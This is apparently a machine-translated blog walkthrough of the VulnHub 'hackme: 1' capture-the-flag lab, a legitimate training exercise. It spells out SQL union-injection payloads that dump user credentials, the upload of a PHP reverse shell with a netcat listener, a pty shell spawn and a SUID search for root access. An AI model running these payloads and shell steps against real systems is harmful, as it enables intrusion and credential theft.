当前位置:网站首页>vulnhub hackme: 1
vulnhub hackme: 1
2022-07-06 08:11:00 【Fairy elephant】
Infiltrate ideas :
nmap scanning ----->dirb and nikto scanning -----> utilize SQL Obtained by joint injection superadmin Account and password -----> Get rebound through file upload vulnerability shell-----> Through the strange directory suid File authorization of permission
environmental information :
Drone aircraft :192.168.101.45
attack :192.168.101.34
Specific steps :
step 1、nmap scanning
sudo nmap -sS -A -p- 192.168.101.45
nmap Conduct TCP Full port scanning , Scan only 22(ssh) and 80(http) Port open
step 2、dirb and nikto scanning
dirb scanning
dirb http://192.168.101.45
Sweep to http://192.168.101.45/uploads/
After visiting with the browser, I found it was a directory , Only one file ,test.png
There is nothing in the picture , Use after downloading strings Command view also has no readable string .
nikto scanning
nikto -host 192.168.101.45
I didn't find anything useful
step 3、 utilize SQL Obtained by joint injection superadmin Account and password
Browser access http://192.168.101.45, Found a login page , At present, there is no prompt information about account and password , Trying universal password failed .
But I found one Sign up now link , You can register an account
After you register your account, click Login here, Go back to the login page to login , After logging in successfully, I found a page that can search book information by book name .
Click directly without entering the book name search Button can get all the book information .
According to the beginning nmap The results of the scan ,web Server is apache, According to the documents in the website .php, It can be inferred that the database rate here is mysql.
See if there is sql Inject :
Then enter in the search box
CISSP
Get a result
Input
CISSP' or 1=1#
Get all the book information
Obviously, it's the ' or 1=1# As sql Part of the statement to execute .
Let's try union Inject :
First try order by, result n No matter what number you enter, there is no result
CISSP' order by n#
No problem , Go straight up union select Well , What is visible to the naked eye here is 3 That's ok , So try it first
CISSP' union select 1,2,3#
It is found that the output is indeed 3 Column , also 3 Columns are visible
Next, enter the following payload
CISSP' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
CISSP' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()#
CISSP' union select 1,group_concat(user),group_concat(pasword) from users#
First, you can get the names of all tables in the current database , It includes users surface
Second, you can get the table users All column names , It includes user and pasword
Third, we can get users Tabular user and pasword All values for column
Notice that one of the users superadmin, Put the corresponding password (2386acb2cf356944177746fc92523983) Get online md5 Decrypt it , obtain Uncrackable
step 4、 Get rebound through file upload vulnerability shell
Log out of the current user , Enter the user name on the login page superadmin And password Uncrackable, Successfully logged in , And the page is different from that of the user registered in the previous step , Is a page for uploading files .
Try to upload the file php-reverse.php, This file is kali linux Upper /usr/share/webshells/php/php-reverse-shell.php Revised $ip and $port After the value of .
After uploading, you will be prompted that the file has been uploaded successfully , And kept it in uploads Under the folder
visit http://192.168.101.45/uploads/ Find out php-reverse.php Indeed, it has been uploaded successfully
Attack aircraft nc monitor 443 port
nc -nlvp 443
Browser access http://192.168.101.45/uploads/php-reverse.php
obtain www-data Rebound of shell
Enter the following command to get interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
step 5、 Through the strange directory suid File authorization of permission
A little bit lucky , stay /home Look under the directory , I found it /home/legacy/touchmenot, This document has suid jurisdiction , After running, you can get root Yes .
In fact, it is more formulaic ,suid The file with permission can be found with the following command
find / -perm -u=s -type f 2>/dev/null
边栏推荐
- Erc20 token agreement
- 08- [istio] istio gateway, virtual service and the relationship between them
- Résumé des diagrammes de description des broches de la série ESP
- Analysis of pointer and array written test questions
- Nc204382 medium sequence
- 你想知道的ArrayList知识都在这
- MFC sends left click, double click, and right click messages to list controls
- 【云原生】手把手教你搭建ferry开源工单系统
- Golang DNS 随便写写
- Asia Pacific Financial Media | designer universe | Guangdong responds to the opinions of the national development and Reform Commission. Primary school students incarnate as small community designers
猜你喜欢
Step by step guide to setting NFT as an ens profile Avatar
Secure captcha (unsafe verification code) of DVWA range
Asia Pacific Financial Media | female pattern ladyvision: forced the hotel to upgrade security. The drunk woman died in the guest room, and the hotel was sentenced not to pay compensation | APEC secur
21. Delete data
What is the use of entering the critical point? How to realize STM32 single chip microcomputer?
Machine learning - decision tree
08- [istio] istio gateway, virtual service and the relationship between them
Go learning notes (3) basic types and statements (2)
Convolution, pooling, activation function, initialization, normalization, regularization, learning rate - Summary of deep learning foundation
Database basic commands
随机推荐
Transformer principle and code elaboration
数据治理:微服务架构下的数据治理
Asia Pacific Financial Media | designer universe | Guangdong responds to the opinions of the national development and Reform Commission. Primary school students incarnate as small community designers
Parameter self-tuning of relay feedback PID controller
PHP - Common magic method (nanny level teaching)
Esrally domestic installation and use pit avoidance Guide - the latest in the whole network
灰度升级 TiDB Operator
Hackathon ifm
Redis list detailed explanation of character types yyds dry goods inventory
From monomer structure to microservice architecture, introduction to microservices
Golang DNS write casually
Online yaml to CSV tool
Migrate data from SQL files to tidb
Sanzi chess (C language)
Leetcode question brushing record | 203_ Remove linked list elements
1204 character deletion operation (2)
[research materials] 2021 China online high growth white paper - Download attached
[research materials] 2022 enterprise wechat Ecosystem Research Report - Download attached
C语言 - 位段
NFT smart contract release, blind box, public offering technology practice -- contract